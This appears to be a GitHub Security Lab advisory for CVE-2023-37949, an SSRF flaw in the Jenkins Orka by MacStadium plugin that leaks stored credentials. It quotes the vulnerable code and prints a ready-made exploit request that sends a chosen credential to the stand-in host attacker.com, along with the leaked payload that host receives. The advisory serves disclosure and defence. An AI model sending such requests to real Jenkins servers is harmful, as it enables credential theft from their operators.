Coordinated Disclosure Timeline
- 2023-04-13: Issue reported to the Jenkins Security team.
- 2023-07-12: Advisory published (fixed in Orka by MacStadium Plugin 1.34).
Summary
A Server-Side Request Forgery (SSRF) vulnerability in jenkinsci/macstadium-orka-plugin allows sensitive credentials to be leaked to an attacker-controlled server. The issue arises from a lack of input validation of the orkaEndpoint parameter in OrkaAgent#doFillNodeItems. The method hardcodes ACL.SYSTEM access to the credentials store, so it can read any credential stored in Jenkins and send it to the attacker-controlled server.
Product
macstadium-orka-plugin Jenkins plugin
Tested Version
Details
Arbitrary secret leakage via SSRF (GHSL-2023-066)
The OrkaAgent#doFillNodeItems method reads the credential identified by the orkaCredentialsId query parameter and sends it to the server specified by the orkaEndpoint query parameter, which can be attacker-controlled:
@POST
public ListBoxModel doFillNodeItems(@QueryParameter String orkaEndpoint,
@QueryParameter String orkaCredentialsId, @QueryParameter boolean useJenkinsProxySettings,
@QueryParameter boolean ignoreSSLErrors) {
return this.infoHelper.doFillNodeItems(orkaEndpoint, orkaCredentialsId, useJenkinsProxySettings,
ignoreSSLErrors);
}
To exploit the vulnerability, the attacker sends a single request to Jenkins specifying the credential to be read and the server to send it to. For example, to leak the FLAG credential to attacker.com, an attacker with Overall/Read permission would send the following request:
POST /jenkins/descriptorByName/io.jenkins.plugins.orka.OrkaAgent/fillNodeItems?orkaEndpoint=https://attacker.com&orkaCredentialsId=FLAG HTTP/1.1
Host: localhost:8080
Connection: close
Content-Length: 0
Note that the attacker does not need to be authenticated if anonymous users have been granted the Overall/Read permission.
The code responsible for reading the arbitrary credential is:
public static <C extends Credentials> C lookupSystemCredentials(final String credentialsId, final Class<C> type) {
    // Looks up the credential as ACL.SYSTEM, i.e. without regard to the requesting user
    return CredentialsMatchers.firstOrNull(
            CredentialsProvider.lookupCredentials(type, Jenkins.get(), ACL.SYSTEM, Collections.emptyList()),
            CredentialsMatchers.withId(credentialsId));
}
As the code shows, the credentials are read with ACL.SYSTEM permissions regardless of the privileges of the user making the request.
Once the credential is retrieved, it is sent to the attacker-controlled server, which receives the following POST request:
POST /token HTTP/1.1
Content-Type: application/json; charset=utf-8
Content-Length: 44
Host: attacker.com
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/4.8.0
{"email":"foo","password":"SUPERSECRETFLAG"}
Since the POST request that initiates the SSRF is a simple request, an attacker could embed malicious JavaScript in a web page that submits this request on the victim's behalf when the victim visits that page.
This vulnerability was found using CodeQL’s SSRF Java query.
Impact
This vulnerability can lead to the leak of sensitive credentials stored in Jenkins to an attacker-controlled server.
CVE
- CVE-2023-37949
Resources
Credit
This issue was discovered and reported by GHSL team member @pwntester (Alvaro Muñoz).
Contact
You can contact the GHSL team at securitylab@github.com; please include a reference to GHSL-2023-066 in any communication regarding this issue.